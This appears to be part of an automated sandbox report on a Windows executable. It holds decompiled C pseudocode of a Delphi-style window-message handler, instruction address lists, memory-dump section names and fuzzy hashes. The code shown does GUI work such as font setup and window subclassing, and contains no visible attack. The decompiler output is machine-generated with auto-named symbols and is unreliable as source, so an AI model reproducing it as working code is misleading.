                                                                        													_t557 = GetObjectA(E0041F478( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x210)) + 0xc)), _t833, _t880), 0x3c,  &_v156);
                                                                        													__eflags = _t557;
                                                                        													if(_t557 != 0) {
                                                                        														E004207B0( *((intOrPtr*)(_v8 + 0x210)), 0);
                                                                        														 *(_v8 + 0x298) = CreateFontIndirectA( &_v156);
                                                                        														 *(_v8 + 0x29c) = SelectObject( *(_t833 + 0x10),  *(_v8 + 0x298));
                                                                        														_t204 =  &_v12; // 0x477760
                                                                        														_t567 =  *_t204;
                                                                        														_t205 = _t567 + 0xc;
                                                                        														 *_t205 =  *(_t567 + 0xc) | 0x00000002;
                                                                        														__eflags =  *_t205;
                                                                        													}
                                                                        												}
                                                                        												_pop(_t942);
                                                                        												 *[fs:eax] = _t942;
                                                                        												_push(0x475ffc);
                                                                        												__eflags = 0;
                                                                        												return E004207B0( *((intOrPtr*)(_v8 + 0x210)), 0);
                                                                        											} else {
                                                                        												_t166 =  &_v12; // 0x477760
                                                                        												 *( *_t166 + 0xc) =  *( *_t166 + 0xc) | 0x00000004;
                                                                        												E00403E54();
                                                                        												E00403E54();
                                                                        												goto L150;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t591 =  *((intOrPtr*)(_v12 + 8));
                                                                        										__eflags =  *(_t591 + 0x38);
                                                                        										if( *(_t591 + 0x38) != 0) {
                                                                        											goto L57;
                                                                        										} else {
                                                                        											E00403E54();
                                                                        											goto L150;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									 *((intOrPtr*)( *_v8 + 0x44))();
                                                                        									_t596 =  *(_t833 + 0xc) - 1;
                                                                        									__eflags = _t596;
                                                                        									if(_t596 == 0) {
                                                                        										_t598 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        										__eflags = _t598;
                                                                        										if(_t598 == 0) {
                                                                        											_t600 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        											__eflags = _t600;
                                                                        											if(_t600 != 0) {
                                                                        												L41:
                                                                        												 *(_v12 + 0xc) = 0x20;
                                                                        											} else {
                                                                        												_t612 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        												__eflags = _t612;
                                                                        												if(_t612 != 0) {
                                                                        													goto L41;
                                                                        												}
                                                                        											}
                                                                        											_t603 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        											__eflags = _t603;
                                                                        											if(_t603 != 0) {
                                                                        												_t610 = _v12;
                                                                        												_t70 = _t610 + 0xc;
                                                                        												 *_t70 =  *(_t610 + 0xc) | 0x00000010;
                                                                        												__eflags =  *_t70;
                                                                        											}
                                                                        											_t605 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        											__eflags = _t605;
                                                                        											if(_t605 != 0) {
                                                                        												_t609 = _v12;
                                                                        												_t75 = _t609 + 0xc;
                                                                        												 *_t75 =  *(_t609 + 0xc) | 0x00000040;
                                                                        												__eflags =  *_t75;
                                                                        											}
                                                                        											_t607 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        											__eflags = _t607;
                                                                        											if(_t607 != 0) {
                                                                        												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000020;
                                                                        											}
                                                                        											goto L82;
                                                                        										} else {
                                                                        											 *[fs:eax] = _t1051;
                                                                        											E004207B0( *((intOrPtr*)(_v8 + 0x210)),  *(_t833 + 0x10));
                                                                        											E0042062C( *((intOrPtr*)(_v8 + 0x210)));
                                                                        											E00420648( *((intOrPtr*)(_v8 + 0x210)));
                                                                        											_v13 =  *((intOrPtr*)( *_v8 + 0xfc))( *[fs:eax], 0x475c4d, _t1049);
                                                                        											_pop(_t965);
                                                                        											 *[fs:eax] = _t965;
                                                                        											_push(0x475c54);
                                                                        											__eflags = 0;
                                                                        											return E004207B0( *((intOrPtr*)(_v8 + 0x210)), 0);
                                                                        										}
                                                                        									} else {
                                                                        										_t631 = _t596 - 1;
                                                                        										__eflags = _t631;
                                                                        										if(_t631 == 0) {
                                                                        											_t633 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        											__eflags = _t633;
                                                                        											if(_t633 != 0) {
                                                                        												 *((intOrPtr*)( *_v8 + 0xfc))();
                                                                        											}
                                                                        										} else {
                                                                        											_t636 = _t631 - 1;
                                                                        											__eflags = _t636;
                                                                        											if(_t636 == 0) {
                                                                        												_t638 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        												__eflags = _t638;
                                                                        												if(_t638 != 0) {
                                                                        													 *((intOrPtr*)( *_v8 + 0xfc))();
                                                                        												}
                                                                        											} else {
                                                                        												__eflags = _t636 == 1;
                                                                        												if(_t636 == 1) {
                                                                        													_t643 =  *((intOrPtr*)( *_v8 + 0x120))();
                                                                        													__eflags = _t643;
                                                                        													if(_t643 != 0) {
                                                                        														 *((intOrPtr*)( *_v8 + 0xfc))();
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        										L82:
                                                                        										__eflags = 0;
                                                                        										_pop(_t921);
                                                                        										 *[fs:eax] = _t921;
                                                                        										_push(0x47667c);
                                                                        										return E00420604( *((intOrPtr*)(_v8 + 0x210)));
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t646 = _t464 - 7;
                                                                        							__eflags = _t646;
                                                                        							if(_t646 == 0) {
                                                                        								 *((char*)(_v8 + 0x231)) = 1;
                                                                        							} else {
                                                                        								__eflags = _t646 == 3;
                                                                        								if(_t646 == 3) {
                                                                        									 *((char*)(_v8 + 0x230)) = 1;
                                                                        								}
                                                                        							}
                                                                        							goto L150;
                                                                        						}
                                                                        					} else {
                                                                        						if(__eflags == 0) {
                                                                        							E00473994( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t1029 + 0xc)), __eflags);
                                                                        							_t655 = E004037D8(_v8, __eflags);
                                                                        							__eflags = _t655;
                                                                        							if(_t655 == 0) {
                                                                        								 *(_v12 + 0xc) = 1;
                                                                        							}
                                                                        						} else {
                                                                        							_t657 = _t463 - 0xffffff98;
                                                                        							__eflags = _t657;
                                                                        							if(__eflags == 0) {
                                                                        								_t854 = E00473964( *((intOrPtr*)(_v8 + 0x22c)), __eflags) - 1;
                                                                        								__eflags = _t854;
                                                                        								if(__eflags >= 0) {
                                                                        									do {
                                                                        										E00473994( *((intOrPtr*)(_v8 + 0x22c)), _t854, __eflags);
                                                                        										E004037D8(_v8, __eflags);
                                                                        										_t854 = _t854 - 1;
                                                                        										__eflags = _t854 - 0xffffffff;
                                                                        									} while (__eflags != 0);
                                                                        								}
                                                                        							} else {
                                                                        								_t666 = _t657 - 1;
                                                                        								__eflags = _t666;
                                                                        								if(__eflags == 0) {
                                                                        									E004037D8(_v8, __eflags);
                                                                        								} else {
                                                                        									_t671 = _t666 - 1;
                                                                        									__eflags = _t671;
                                                                        									if(__eflags == 0) {
                                                                        										E00473994( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t1029 + 0xc)), __eflags);
                                                                        										E004037D8(_v8, __eflags);
                                                                        									} else {
                                                                        										__eflags = _t671 - 1;
                                                                        										if(__eflags == 0) {
                                                                        											_t855 = _t1029;
                                                                        											E00473994( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t855 + 0xc)), __eflags);
                                                                        											E004037D8(_v8, __eflags);
                                                                        											_t685 = _v8;
                                                                        											__eflags =  *((short*)(_t685 + 0x36a));
                                                                        											if( *((short*)(_t685 + 0x36a)) != 0) {
                                                                        												__eflags =  *((intOrPtr*)(_t855 + 0x1c)) - 8;
                                                                        												if( *((intOrPtr*)(_t855 + 0x1c)) == 8) {
                                                                        													__eflags =  *(_t855 + 0x18) & 0x00000002;
                                                                        													if(( *(_t855 + 0x18) & 0x00000002) == 0) {
                                                                        														L139:
                                                                        														__eflags =  *(_t855 + 0x18) & 0x00000002;
                                                                        														if(( *(_t855 + 0x18) & 0x00000002) == 0) {
                                                                        															__eflags =  *(_t855 + 0x14) & 0x00000002;
                                                                        															if(( *(_t855 + 0x14) & 0x00000002) != 0) {
                                                                        																 *((intOrPtr*)(_v8 + 0x368))(1);
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														__eflags =  *(_t855 + 0x14) & 0x00000002;
                                                                        														if(( *(_t855 + 0x14) & 0x00000002) != 0) {
                                                                        															goto L139;
                                                                        														} else {
                                                                        															 *((intOrPtr*)(_v8 + 0x368))(0);
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        											_t687 =  *((intOrPtr*)( *_v8 + 0x3c))();
                                                                        											__eflags = _t687;
                                                                        											if(_t687 != 0) {
                                                                        												_t688 = _v8;
                                                                        												__eflags =  *(_t688 + 0x1c) & 0x00000010;
                                                                        												if(( *(_t688 + 0x1c) & 0x00000010) == 0) {
                                                                        													_t689 = _v8;
                                                                        													__eflags =  *(_t689 + 0x6c);
                                                                        													if( *(_t689 + 0x6c) != 0) {
                                                                        														 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x6c)))) + 0x18))();
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L150;
                                                                        					}
                                                                        				} else {
                                                                        					if(_t1052 == 0) {
                                                                        						E0047582C(__ebx,  *((intOrPtr*)(_v12 + 8)) + 0xc, __edi, _t1029);
                                                                        						_t702 = E004037D8(_v8, __eflags);
                                                                        						__eflags = _t702;
                                                                        						if(_t702 == 0) {
                                                                        							 *(_v12 + 0xc) = 1;
                                                                        						}
                                                                        						_t703 = _v12;
                                                                        						__eflags =  *(_t703 + 0xc);
                                                                        						if( *(_t703 + 0xc) == 0) {
                                                                        							_t858 = E00426CC8(E0043CC2C(_v8));
                                                                        							 *(_v8 + 0x258) = _t858;
                                                                        							 *((intOrPtr*)(_v8 + 0x254)) = GetWindowLongA(_t858, 0xfffffffc);
                                                                        							SetWindowLongA( *(_v8 + 0x258), 0xfffffffc,  *(_v8 + 0x250));
                                                                        						}
                                                                        					} else {
                                                                        						_t1053 = _t463 - 0xffffff8d;
                                                                        						if(_t1053 > 0) {
                                                                        							_t715 = _t463 - 0xffffff8f;
                                                                        							__eflags = _t715;
                                                                        							if(_t715 == 0) {
                                                                        								 *((intOrPtr*)( *_v8 + 0x118))();
                                                                        							} else {
                                                                        								_t720 = _t715 - 4;
                                                                        								__eflags = _t720;
                                                                        								if(_t720 == 0) {
                                                                        									 *(_v8 + 0x26c) =  *( *((intOrPtr*)(_v12 + 8)) + 0xc);
                                                                        								} else {
                                                                        									_t724 = _t720 - 1;
                                                                        									__eflags = _t724;
                                                                        									if(__eflags == 0) {
                                                                        										E00476F10(_v8);
                                                                        										E004037D8(_v8, __eflags);
                                                                        									} else {
                                                                        										__eflags = _t724 == 2;
                                                                        										if(_t724 == 2) {
                                                                        											_t732 = _t1029;
                                                                        											__eflags =  *(_t732 + 0x20);
                                                                        											if( *(_t732 + 0x20) != 0) {
                                                                        												__eflags =  *((intOrPtr*)(_t732 + 0x10)) - 0xffffffff;
                                                                        												if(__eflags != 0) {
                                                                        													E004037D8(_v8, __eflags);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							if(_t1053 == 0) {
                                                                        								 *((intOrPtr*)( *_v8 + 0x11c))(E00475994( *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 0x18))), E00475994( *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 0x14))));
                                                                        							} else {
                                                                        								_t741 = _t463 - 0xfffffecc;
                                                                        								if(_t741 == 0) {
                                                                        									_t1042 =  *(_t1029 + 0x14);
                                                                        									__eflags =  *_t1042 & 0x00000001;
                                                                        									if(( *_t1042 & 0x00000001) != 0) {
                                                                        										_t744 = E00476F10(_v8);
                                                                        										__eflags =  *((intOrPtr*)(_t744 + 0x18)) - _t1042[4];
                                                                        										if( *((intOrPtr*)(_t744 + 0x18)) < _t1042[4]) {
                                                                        											_t747 = E00476F10(_v8);
                                                                        											__eflags =  *((intOrPtr*)(_t747 + 0x14)) - _t1042[4];
                                                                        											if( *((intOrPtr*)(_t747 + 0x14)) <= _t1042[4]) {
                                                                        												_push( *((intOrPtr*)(E00476F10(_v8) + 0x14)));
                                                                        												_t753 = E00476F10(_v8);
                                                                        												_pop(_t999);
                                                                        												E00472AA4(_t753, _t999);
                                                                        											}
                                                                        										} else {
                                                                        											_push( *((intOrPtr*)(E00476F10(_v8) + 0x18)));
                                                                        											_t759 = E00476F10(_v8);
                                                                        											_pop(_t1002);
                                                                        											E00472AA4(_t759, _t1002);
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									_t761 = _t741 - 0x97;
                                                                        									if(_t761 == 0) {
                                                                        										_t762 = _v8;
                                                                        										__eflags =  *((short*)(_t762 + 0x35a));
                                                                        										if( *((short*)(_t762 + 0x35a)) != 0) {
                                                                        											E004413CC( &_v168);
                                                                        											_t766 =  *0x495ad0; // 0x496c04
                                                                        											E004573E0( *_t766, __ebx,  &_v168, __edi, _t1029);
                                                                        										}
                                                                        									} else {
                                                                        										_t769 = _t761 - 5;
                                                                        										if(_t769 == 0) {
                                                                        											_t864 = _t1029;
                                                                        											_v14 = E00475970( *(_t864 + 0x10));
                                                                        											_t1043 = 0;
                                                                        											E00404348( &_v20);
                                                                        											E004067C4(0,  &_v28, 0);
                                                                        											_v29 = 4;
                                                                        											_t778 = _v14 - 1;
                                                                        											__eflags = _t778;
                                                                        											if(_t778 < 0) {
                                                                        												_t1043 =  *((intOrPtr*)(_t864 + 0x18));
                                                                        											} else {
                                                                        												__eflags = _t778 - 2;
                                                                        												if(__eflags < 0) {
                                                                        													_t1025 =  *(_t864 + 0x14);
                                                                        													__eflags = _t1025;
                                                                        													if(_t1025 == 0) {
                                                                        														E00404348( &_v20);
                                                                        													} else {
                                                                        														E00408DF0(_t1025,  &_v20);
                                                                        													}
                                                                        												} else {
                                                                        													if(__eflags == 0) {
                                                                        														_v28 =  *((intOrPtr*)(_t864 + 0x1c));
                                                                        														_v24 =  *((intOrPtr*)(_t864 + 0x20));
                                                                        														_t795 =  *((intOrPtr*)(_t864 + 0x24)) - 0x25;
                                                                        														__eflags = _t795;
                                                                        														if(_t795 == 0) {
                                                                        															_v29 = 0;
                                                                        														} else {
                                                                        															_t796 = _t795 - 1;
                                                                        															__eflags = _t796;
                                                                        															if(_t796 == 0) {
                                                                        																_v29 = 2;
                                                                        															} else {
                                                                        																_t797 = _t796 - 1;
                                                                        																__eflags = _t797;
                                                                        																if(_t797 == 0) {
                                                                        																	_v29 = 1;
                                                                        																} else {
                                                                        																	__eflags = _t797 == 1;
                                                                        																	if(_t797 == 1) {
                                                                        																		_v29 = 3;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        											_t781 = _v29;
                                                                        											__eflags =  *(_t864 + 0x10) & 0x00000020;
                                                                        											E00475970( *(_t864 + 0x10));
                                                                        											 *(_v12 + 0xc) =  *((intOrPtr*)( *_v8 + 0x114))(_t781 & 0xffffff00 | ( *(_t864 + 0x10) & 0x00000020) != 0x00000000, _t781,  *((intOrPtr*)(_t864 + 0xc)), _t1043,  &_v28);
                                                                        										} else {
                                                                        											if(_t769 == 2) {
                                                                        												_t1026 = E0047582C(__ebx,  *((intOrPtr*)(_v12 + 8)) + 0xc, __edi, _t1029);
                                                                        												_t866 =  *((intOrPtr*)(_v12 + 8)) + 0xc;
                                                                        												__eflags =  *_t866 & 0x00000001;
                                                                        												if(( *_t866 & 0x00000001) != 0) {
                                                                        													_t1046 = _t866[8];
                                                                        													__eflags = _t1046;
                                                                        													if(_t1046 != 0) {
                                                                        														_v40 =  *((intOrPtr*)(_t1026 + 8));
                                                                        														_t824 =  *((intOrPtr*)( *_v40 + 0x14))();
                                                                        														__eflags = _t1046 - _t824;
                                                                        														if(_t1046 > _t824) {
                                                                        															 *(_t866[0x14]) = 0;
                                                                        														} else {
                                                                        															 *((intOrPtr*)( *_v40 + 0xc))();
                                                                        															E00408CB4(_t866[0x14], _t866[0x18] - 1, _v160);
                                                                        														}
                                                                        													} else {
                                                                        														E00408CB4(_t866[0x14], _t866[0x18] - 1,  *((intOrPtr*)(_t1026 + 0x24)));
                                                                        													}
                                                                        												}
                                                                        												__eflags =  *_t866 & 0x00000002;
                                                                        												if(( *_t866 & 0x00000002) != 0) {
                                                                        													__eflags = _t866[8];
                                                                        													if(_t866[8] != 0) {
                                                                        														_t1045 = _t866[8] - 1;
                                                                        														__eflags = _t1045;
                                                                        														if(_t1045 >= 0) {
                                                                        															_t808 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1026 + 8)))) + 0x14))();
                                                                        															__eflags = _t1045 - _t808;
                                                                        															if(_t1045 < _t808) {
                                                                        																_v36 = E00473828(_t1026);
                                                                        																__eflags = _t866[8] - 1;
                                                                        																E00477A28(_v8, _t866[8] - 1, _t1026,  &_v36);
                                                                        																_t866[0x1c] = _v36;
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														E00476F9C(_v8, _t1026);
                                                                        														_t866[0x1c] =  *(_t1026 + 0x10);
                                                                        														_t818 = _v8;
                                                                        														__eflags =  *(_t818 + 0x220);
                                                                        														if( *(_t818 + 0x220) != 0) {
                                                                        															_t866[0xc] = E00426B9C( *((intOrPtr*)(_t1026 + 0x20)) + 1);
                                                                        															_t866[0x10] = 0xf000;
                                                                        															 *_t866 =  *_t866 | 0x00000008;
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        												__eflags =  *_t866 & 0x00000010;
                                                                        												if(( *_t866 & 0x00000010) != 0) {
                                                                        													_t866[0x24] =  *(_t1026 + 0x14);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L150:
                                                                        					_pop(_t916);
                                                                        					 *[fs:eax] = _t916;
                                                                        					_push(0x4766a4);
                                                                        					E00404348( &_v160);
                                                                        					return E00404348( &_v20);
                                                                        				}
                                                                        			}

                                                                        0x00475e8e
                                                                        0x00475e95
                                                                        0x00475e99
                                                                        0x00475ed0
                                                                        0x00475ed7
                                                                        0x00475ee6
                                                                        0x00475e9b
                                                                        0x00475ea8
                                                                        0x00475eaf
                                                                        0x00475eb5
                                                                        0x00475eb5
                                                                        0x00475ec3
                                                                        0x00475ec3
                                                                        0x00475ee9
                                                                        0x00475eed
                                                                        0x00475f05
                                                                        0x00475f08
                                                                        0x00475f0f
                                                                        0x00475f18
                                                                        0x00475f22
                                                                        0x00475f28
                                                                        0x00475f2d
                                                                        0x00475f30
                                                                        0x00475f33
                                                                        0x00475f38
                                                                        0x00475f3b
                                                                        0x00475f3e
                                                                        0x00475f41
                                                                        0x00475f4f
                                                                        0x00475f68
                                                                        0x00475f86
                                                                        0x00475f8b
                                                                        0x00475f8d
                                                                        0x00475f9a
                                                                        0x00475fae
                                                                        0x00475fca
                                                                        0x00475fd0
                                                                        0x00475fd0
                                                                        0x00475fd3
                                                                        0x00475fd3
                                                                        0x00475fd3
                                                                        0x00475fd3
                                                                        0x00475f8d
                                                                        0x00475fd9
                                                                        0x00475fdc
                                                                        0x00475fdf
                                                                        0x00475fed
                                                                        0x00475ff4
                                                                        0x00475eef
                                                                        0x00475eef
                                                                        0x00475ef2
                                                                        0x00475ef6
                                                                        0x00475efb
                                                                        0x00000000
                                                                        0x00475efb
                                                                        0x00475eed
                                                                        0x00475d88
                                                                        0x00475d8b
                                                                        0x00475d8e
                                                                        0x00475d92
                                                                        0x00000000
                                                                        0x00475d94
                                                                        0x00475d94
                                                                        0x00000000
                                                                        0x00475d94
                                                                        0x00475d92
                                                                        0x00475b90
                                                                        0x00475b98
                                                                        0x00475b9e
                                                                        0x00475b9e
                                                                        0x00475b9f
                                                                        0x00475bc4
                                                                        0x00475bca
                                                                        0x00475bcc
                                                                        0x00475c77
                                                                        0x00475c7d
                                                                        0x00475c7f
                                                                        0x00475c94
                                                                        0x00475c97
                                                                        0x00475c81
                                                                        0x00475c8a
                                                                        0x00475c90
                                                                        0x00475c92
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00475c92
                                                                        0x00475ca7
                                                                        0x00475cad
                                                                        0x00475caf
                                                                        0x00475cb1
                                                                        0x00475cb4
                                                                        0x00475cb4
                                                                        0x00475cb4
                                                                        0x00475cb4
                                                                        0x00475cc1
                                                                        0x00475cc7
                                                                        0x00475cc9
                                                                        0x00475ccb
                                                                        0x00475cce
                                                                        0x00475cce
                                                                        0x00475cce
                                                                        0x00475cce
                                                                        0x00475cdb
                                                                        0x00475ce1
                                                                        0x00475ce3
                                                                        0x00475cec
                                                                        0x00475cec
                                                                        0x00000000
                                                                        0x00475bd2
                                                                        0x00475bdd
                                                                        0x00475bec
                                                                        0x00475c00
                                                                        0x00475c17
                                                                        0x00475c2c
                                                                        0x00475c31
                                                                        0x00475c34
                                                                        0x00475c37
                                                                        0x00475c45
                                                                        0x00475c4c
                                                                        0x00475c4c
                                                                        0x00475ba1
                                                                        0x00475ba1
                                                                        0x00475ba1
                                                                        0x00475ba2
                                                                        0x00475cfe
                                                                        0x00475d04
                                                                        0x00475d06
                                                                        0x00475d16
                                                                        0x00475d16
                                                                        0x00475ba8
                                                                        0x00475ba8
                                                                        0x00475ba8
                                                                        0x00475ba9
                                                                        0x00475d2a
                                                                        0x00475d30
                                                                        0x00475d32
                                                                        0x00475d42
                                                                        0x00475d42
                                                                        0x00475baf
                                                                        0x00475baf
                                                                        0x00475bb0
                                                                        0x00475d56
                                                                        0x00475d5c
                                                                        0x00475d5e
                                                                        0x00475d6e
                                                                        0x00475d6e
                                                                        0x00475d5e
                                                                        0x00475bb0
                                                                        0x00475ba9
                                                                        0x0047619f
                                                                        0x0047619f
                                                                        0x004761a1
                                                                        0x004761a4
                                                                        0x004761a7
                                                                        0x004761ba
                                                                        0x004761ba
                                                                        0x00475b9f
                                                                        0x00475b8a
                                                                        0x00475ab5
                                                                        0x00475ab5
                                                                        0x00475ab5
                                                                        0x00475ab8
                                                                        0x00476675
                                                                        0x00475abe
                                                                        0x00475abe
                                                                        0x00475ac1
                                                                        0x00476669
                                                                        0x00476669
                                                                        0x00475ac1
                                                                        0x00000000
                                                                        0x00475ab8
                                                                        0x00475a83
                                                                        0x00475a83
                                                                        0x00476556
                                                                        0x00476567
                                                                        0x0047656c
                                                                        0x0047656e
                                                                        0x00476577
                                                                        0x00476577
                                                                        0x00475a89
                                                                        0x00475a89
                                                                        0x00475a89
                                                                        0x00475a8c
                                                                        0x00476203
                                                                        0x00476204
                                                                        0x00476207
                                                                        0x0047620d
                                                                        0x00476218
                                                                        0x00476226
                                                                        0x0047622b
                                                                        0x0047622c
                                                                        0x0047622c
                                                                        0x00476231
                                                                        0x00475a92
                                                                        0x00475a92
                                                                        0x00475a92
                                                                        0x00475a93
                                                                        0x004761e9
                                                                        0x00475a99
                                                                        0x00475a99
                                                                        0x00475a99
                                                                        0x00475a9a
                                                                        0x0047652d
                                                                        0x0047653b
                                                                        0x00475aa0
                                                                        0x00475aa0
                                                                        0x00475aa1
                                                                        0x00476586
                                                                        0x00476594
                                                                        0x004765a7
                                                                        0x004765ac
                                                                        0x004765af
                                                                        0x004765b7
                                                                        0x004765b9
                                                                        0x004765bd
                                                                        0x004765bf
                                                                        0x004765c3
                                                                        0x004765e3
                                                                        0x004765e3
                                                                        0x004765e7
                                                                        0x004765e9
                                                                        0x004765ed
                                                                        0x004765ff
                                                                        0x004765ff
                                                                        0x004765ed
                                                                        0x004765c5
                                                                        0x004765c5
                                                                        0x004765c9
                                                                        0x00000000
                                                                        0x004765cb
                                                                        0x004765db
                                                                        0x004765db
                                                                        0x004765c9
                                                                        0x004765c3
                                                                        0x004765bd
                                                                        0x0047660a
                                                                        0x0047660d
                                                                        0x0047660f
                                                                        0x00476611
                                                                        0x00476614
                                                                        0x00476618
                                                                        0x0047661a
                                                                        0x0047661d
                                                                        0x00476621
                                                                        0x0047662e
                                                                        0x0047662e
                                                                        0x00476621
                                                                        0x00476618
                                                                        0x00000000
                                                                        0x00475aa7
                                                                        0x00475aa1
                                                                        0x00475a9a
                                                                        0x00475a93
                                                                        0x00475a8c
                                                                        0x00000000
                                                                        0x00475a83
                                                                        0x00475a19
                                                                        0x00475a19
                                                                        0x00476457
                                                                        0x00476467
                                                                        0x0047646c
                                                                        0x0047646e
                                                                        0x00476473
                                                                        0x00476473
                                                                        0x0047647a
                                                                        0x0047647d
                                                                        0x00476481
                                                                        0x00476494
                                                                        0x00476499
                                                                        0x004764aa
                                                                        0x004764c6
                                                                        0x004764c6
                                                                        0x00475a1f
                                                                        0x00475a1f
                                                                        0x00475a22
                                                                        0x00475a57
                                                                        0x00475a57
                                                                        0x00475a5a
                                                                        0x0047634a
                                                                        0x00475a60
                                                                        0x00475a60
                                                                        0x00475a60
                                                                        0x00475a63
                                                                        0x004761ce
                                                                        0x00475a69
                                                                        0x00475a69
                                                                        0x00475a69
                                                                        0x00475a6a
                                                                        0x00476506
                                                                        0x00476514
                                                                        0x00475a70
                                                                        0x00475a70
                                                                        0x00475a73
                                                                        0x004764d3
                                                                        0x004764d5
                                                                        0x004764d9
                                                                        0x004764df
                                                                        0x004764e3
                                                                        0x004764f3
                                                                        0x004764f3
                                                                        0x004764e3
                                                                        0x004764d9
                                                                        0x00475a73
                                                                        0x00475a6a
                                                                        0x00475a63
                                                                        0x00475a24
                                                                        0x00475a24
                                                                        0x00476440
                                                                        0x00475a2a
                                                                        0x00475a2a
                                                                        0x00475a2f
                                                                        0x00475ad1
                                                                        0x00475ad4
                                                                        0x00475ad7
                                                                        0x00475ae3
                                                                        0x00475aeb
                                                                        0x00475aee
                                                                        0x00475b1b
                                                                        0x00475b23
                                                                        0x00475b26
                                                                        0x00475b3a
                                                                        0x00475b41
                                                                        0x00475b46
                                                                        0x00475b47
                                                                        0x00475b47
                                                                        0x00475af0
                                                                        0x00475afe
                                                                        0x00475b05
                                                                        0x00475b0a
                                                                        0x00475b0b
                                                                        0x00475b0b
                                                                        0x00475aee
                                                                        0x00475a35
                                                                        0x00475a35
                                                                        0x00475a3a
                                                                        0x00476633

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: LongWindow
                                                                        • String ID: $`wG$lkI
                                                                        • API String ID: 1378638983-2299678225
                                                                        • Opcode ID: 338f8f7f42b1aaf73cd1e7ae5260077238943ef14a3e873eb25f55d2ff597f27
                                                                        • Instruction ID: 2bc2a923c6bc387d68c561a48e6f81130dd822a8b8ba7e24570715933eb10461
                                                                        • Opcode Fuzzy Hash: 338f8f7f42b1aaf73cd1e7ae5260077238943ef14a3e873eb25f55d2ff597f27
                                                                        • Instruction Fuzzy Hash: 8F823974A00604DFCB04DF68C589ADAB7F2EF48314F6581A6E8089B366C778EE41DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00452974(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _t149;
                                                                        				intOrPtr _t154;
                                                                        				intOrPtr _t155;
                                                                        				intOrPtr _t160;
                                                                        				intOrPtr _t162;
                                                                        				intOrPtr _t163;
                                                                        				void* _t165;
                                                                        				struct HWND__* _t166;
                                                                        				long _t176;
                                                                        				signed int _t198;
                                                                        				signed int _t199;
                                                                        				long _t220;
                                                                        				intOrPtr _t226;
                                                                        				int _t231;
                                                                        				intOrPtr _t232;
                                                                        				intOrPtr _t241;
                                                                        				intOrPtr _t245;
                                                                        				signed int _t248;
                                                                        				intOrPtr _t251;
                                                                        				intOrPtr _t252;
                                                                        				signed int _t258;
                                                                        				long _t259;
                                                                        				intOrPtr _t262;
                                                                        				intOrPtr _t266;
                                                                        				signed int _t269;
                                                                        				intOrPtr _t270;
                                                                        				intOrPtr _t271;
                                                                        				signed int _t277;
                                                                        				long _t278;
                                                                        				intOrPtr _t281;
                                                                        				signed int _t286;
                                                                        				signed int _t287;
                                                                        				long _t290;
                                                                        				intOrPtr _t294;
                                                                        				struct HWND__* _t299;
                                                                        				signed int _t301;
                                                                        				signed int _t302;
                                                                        				signed int _t305;
                                                                        				signed int _t307;
                                                                        				long _t308;
                                                                        				signed int _t311;
                                                                        				signed int _t313;
                                                                        				long _t314;
                                                                        				signed int _t317;
                                                                        				signed int _t318;
                                                                        				signed int _t326;
                                                                        				long _t328;
                                                                        				intOrPtr _t331;
                                                                        				intOrPtr _t362;
                                                                        				long _t370;
                                                                        				void* _t372;
                                                                        				void* _t373;
                                                                        				intOrPtr _t374;
                                                                        
                                                                        				_t372 = _t373;
                                                                        				_t374 = _t373 + 0xfffffff8;
                                                                        				_v12 = 0;
                                                                        				_v8 = __eax;
                                                                        				_push(_t372);
                                                                        				_push(0x452ede);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t374;
